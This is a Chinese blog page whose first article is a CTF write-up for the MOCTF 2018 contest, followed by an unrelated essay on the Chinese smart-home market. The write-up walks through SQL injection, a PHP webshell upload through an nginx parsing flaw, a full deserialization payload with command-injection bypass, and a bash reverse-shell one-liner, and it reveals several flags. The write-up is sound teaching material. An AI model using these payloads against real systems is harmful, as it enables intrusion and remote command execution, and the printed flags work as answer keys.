首页 文章 精选 留言 我的

精选列表

搜索[赛博朋克],共10000篇文章
优秀的个人博客,低调大师

MOCTF新春欢乐赛部分WP

已经过去有段时间了,比赛在年前,现在才有时间整理一下当时做出的一些题目。 当作是一个复习梳理了 比赛地址:http://happy.moctf.com/ 官方所有WP:https://github.com/xishir/moctf/tree/master/2018MOCTF 比赛首页.png 0x00是时候让你的手指锻炼一下了 image.png 打开链接的页面内容如下 image.png 查看页面源码发现,最终会调用JS代码生成表单并且提交clicks参数,参数内容为点击的次数,这里可以手动传参108000次即可拿到flag image.png image.png 0x01要认真 打开链接,呈现的是一个文章管理系统,题目提示是能够getshell image.png image.png 通过各个页面的查看,其中找到show.php查看内容时存在sql注入点 image.png 直接起sqlmap,拿数据库、表和字段内容,得到后台登陆用户和哈希的密码 image.png 通过MD5破解直接拿到明文“moctf6”,之后可以直接登陆后台 image.png image.png 在后台存在一个文件管理功能模块,存在上传点,通过测试发现,检测了上传文件的后缀,只允许png、jpg等图片格式 查看响应头,发现是nginx服务器 image.png 这里可以利用nginx的解析漏洞来上传执行webshell 详见:http://blog.csdn.net/wn314/article/details/77388289 上传一个内容为php一句话的 image.png 最后利用webshell直接进行操作找flag即可 image.png 0x02PUBG image.png 访问页面内容是吃鸡既视感 image.png 查看页面源码,没有特别的信息泄露,尝试扫描常见信息泄露,发现存在.bak备份,得到源码 image.png 同样的,class.php也存在bak image.png 这里需要分析其中的php逻辑,可以看到一个关键点是$p=unserialize($pubg) 而class.php中定义了__wakeup函数和__call函数 其中反序列化得到对象会执行__wakeup函数,而调用不存在的函数会执行到__call中 这里需要绕过__wakeup中的赋值操作,才能在__destruct判断逻辑中去执行Get_air_drops函数,并且去调用__call来执行系统命令 因此需要利用到 CVE-2016-7124反序列化漏洞 最后配合system函数的系统命令执行来拿到flag,其中还需要进行一定程度的命令执行绕过 最终payload为 http://120.78.57.208:6001/index.php?LandIn=school&pubg=O:7:"sheldon":3:{s:3:"bag";s:42:"flag.;a=c;b=a;c=t;$a$b$c ./class/flag.php;";s:6:"weapon";s:3:"AWM";} image.png 0x03ping一下好吗 image.png image.png 页面提供了一个ping的目的ip,此题比较简单,可以利用远程命令执行配合DNSLOG拿到执行结果回显 此处反弹shell没有效果 bash -i >& /dev/tcp/ip/port 0>&1 直接命令执行接: ls|awk 'FNR==n{print}' #这里n是特定数字,输出第n行 image.png 访问此文件既拿到flag image.png 0x04一万年的爱有多久 image.png 下载得到一个zip压缩包,经过测试,解压后得到的还是一个随机字符串的压缩包,似乎永无止境 于是写脚本进行解压,看看有没有尽头 import zipfile import os file_list = os.listdir(r'.') for file_name in file_list: if os.path.splitext(file_name)[1] == '.zip': print file_name file_zip = zipfile.ZipFile(file_name, 'r') for file in file_zip.namelist(): file_zip.extract(file, r'.') file_zip.close() os.remove(file_name)` #!/bin/sh for i in $(seq 1 100000) do python zip.py >/dev/null done 最后得到解压的结果flag image.png 0x05Hacker!!! image.png 下载得到一个流量包文件,使用wireshark进行分析 image.png 通过流量包内容可以看到,记录了一些HTTP请求和响应,其中HTTP请求中的url是SQL盲注 通过分析盲注的结果,可以拿到正确内容的ascii码,最后拼凑得到flag 109 111 99 116 102 123 72 116 116 112 95 49 115 95 100 52 110 103 51 114 73 48 117 53 125 moctf{Http_1s_d4ng3rI0u5}

优秀的个人博客,低调大师

智能家居市场的“拼盘”接力赛

在日前魅族推出自己的新款产品路由器的同一天,乐视发布公告称从酷派集团第一大股东手中接过11%的股份,从而成为后者的单一最大股东。项庄舞剑,意在沛公。乐视再一次入股酷派重点显然不是股权,而是获取酷派的智能手机产业链优势。同时人们也非常清楚,虽然两起商业事件中的产品主角一个是路由器,一个是智能手机,但魅族与乐视却有着同样的目的,即发力布局各自的智能家居生态。 实际上,无论魅族还是乐视,在智能家居地带落子已不是第一次了。一年前,魅族就选择与海尔联手打造智能生态圈,双方在智能家居层面给予对方“超级权限”:魅族通过lifekit向海尔提供超越Apps的系统级别权限,而海尔将开放U+SDK让魅族手机可深入控制海尔全线智能产品。5个月后,乐视宣布以21.8亿元入股酷派,持股17.9%成为酷派第二大股东。 智能家居产业链既牵涉芯片、传感器、无源器件和电路板等上游零部件,也包括智能控制终端工具、智能控制中心、数据传输模块和处理模块等中游关键环节,更关联智能调温器、家用电器、照明、安防和小型智能单品,还包括内容推送。如此大的系列产品家族阵营,远不是一家企业的功力所能覆盖。因此,在选择一个或几个自家产品落地智能家居市场后,相关企业都会像魅族与乐视那样寻求外部合作者,整编与扩充自身的智能家居棋盘。而国内互联网企业成了在智能家居市场合纵连横的主力军。 “BAT”活跃于智能家居市场的身影最值得关注。除了在魅族与海尔合作建构的智能家居生态圈中看到了阿里巴巴作为重要股东的身影外,前不久百度硅谷人工智能实验与全球领先的智能遥控应用开发商Peel达成合作协议,百度deep speech语音技术将嵌入peel智能家居控制平台,而且百度还将深度语音技术应用到更多智能家居之中。 作为战略转型的核心步骤和必然选择,我国家电制造巨头纷纷搭建起了智能家居系统或创建相关商业模式,如海尔建立了U+系统,美的推出了“1+1+1”(一个智慧管家系统+一个M-Smart互动社区+一个M-BOX管理中心)系统,TCL提出了“智能+互联网”与“产品+服务”的“双+”驱动模式等,从而构成了对互联网企业的合作引力。鉴于制造业的庞大身躯、重资产经营及思维模式可能构成转型的桎梏,更多传统家电制造巨头选择资本和股权层面的合作方式来捆绑优质互联网资源以谋求共赢。如美的通过定向增发的方式让小米获得了1.29%股份,小米一名核心高管进入美的董事会;在通过旗下的欢网科技引入腾讯5000万元战略投资从而让腾讯成了前者第三大股东后,TCL过去半年内先后两次引乐视入股,使乐视对TCL控股子公司TCL多媒体的持股比例升至20.1%,并成为后者的第二大股东。相比于产品合作,资本层面的联姻无疑更紧密,有利于合作方更深入拓展智能家居市场。 据市场研究公司statista发布的最新数据,去年我国智能家居市场规模达403.40亿,同比增长41%,但与美国相比,我国智能家居渗透率还不到5%。不过,我国互联网用户已达6.68亿,互联网渗透率为50%左右;与此同时,我国智能家居存在着极强的需求能力。若按家户算,目前约1400多万家庭户均年收入在18.6万元以上,人口约4460万,占我国城市总人口的10%,概算下来,主要针对富裕阶层的智能家居市场总量为1400万套。据此,statista预计,到2018年我国智能家居市场规模将达1300亿,未来年均复合增长率将达48%左右。显然,以集团军形式抢占智能家居阵地的战争只是刚刚打响。 不过,既然是合作,国内企业就不应停留在产品与资本层面。目前,智能家居系统中的各个单品或子系统与子系统之间并不相容和互联的矛盾非常突出,同时智能家居也并不能局限在室内,而应是一个室内系统与屋外系统互联互通的“大家庭”空间,如用户可进入车载系统,在汽车上控制和监测室内家电,这种基于物联网技术背景的智能家居与车联网的结合应当是未来家庭智能化的重要趋势。不仅如此,大数据时代的智能家居不仅是住宅智能化,还会辐射和扩展到用户的诸多生活领域,覆盖衣食住行,由此决定了更多主体将参与到市场中来。制定出智能家居统一的游戏规则即智能家居产品与服务的行业标准就时不我待地提到了前台。 全球物联网标准的非营利性组织ZigBee联盟不久前推出了ZigBee3.0标准,这是第一个统一、开放和完整的无线物联网产品开发解决方案。它意味着,世上任何一家公司基于ZigBee3.0标准的智能家居产品都可实现互联。作为推动者,美的加入了ZigBee联盟。但需要提醒的是,若从一开始我国企业就在别人划定好的跑道上起步,接下来可能会越来越被动。争取打造与制定出统一的标准体系,是中国企业在智能家居市场需要合力拿下的最重要城池。本文转自d1net(转载)

资源下载

更多资源
Nacos

Nacos

Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service 的首字母简称,一个易于构建 AI Agent 应用的动态服务发现、配置管理和AI智能体管理平台。Nacos 致力于帮助您发现、配置和管理微服务及AI智能体应用。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据、流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。

Rocky Linux

Rocky Linux

Rocky Linux(中文名:洛基)是由Gregory Kurtzer于2020年12月发起的企业级Linux发行版,作为CentOS稳定版停止维护后与RHEL(Red Hat Enterprise Linux)完全兼容的开源替代方案,由社区拥有并管理,支持x86_64、aarch64等架构。其通过重新编译RHEL源代码提供长期稳定性,采用模块化包装和SELinux安全架构,默认包含GNOME桌面环境及XFS文件系统,支持十年生命周期更新。

Sublime Text

Sublime Text

Sublime Text具有漂亮的用户界面和强大的功能,例如代码缩略图,Python的插件,代码段等。还可自定义键绑定,菜单和工具栏。Sublime Text 的主要功能包括:拼写检查,书签,完整的 Python API , Goto 功能,即时项目切换,多选择,多窗口等等。Sublime Text 是一个跨平台的编辑器,同时支持Windows、Linux、Mac OS X等操作系统。

WebStorm

WebStorm

WebStorm 是jetbrains公司旗下一款JavaScript 开发工具。目前已经被广大中国JS开发者誉为“Web前端开发神器”、“最强大的HTML5编辑器”、“最智能的JavaScript IDE”等。与IntelliJ IDEA同源,继承了IntelliJ IDEA强大的JS部分的功能。

用户登录
用户注册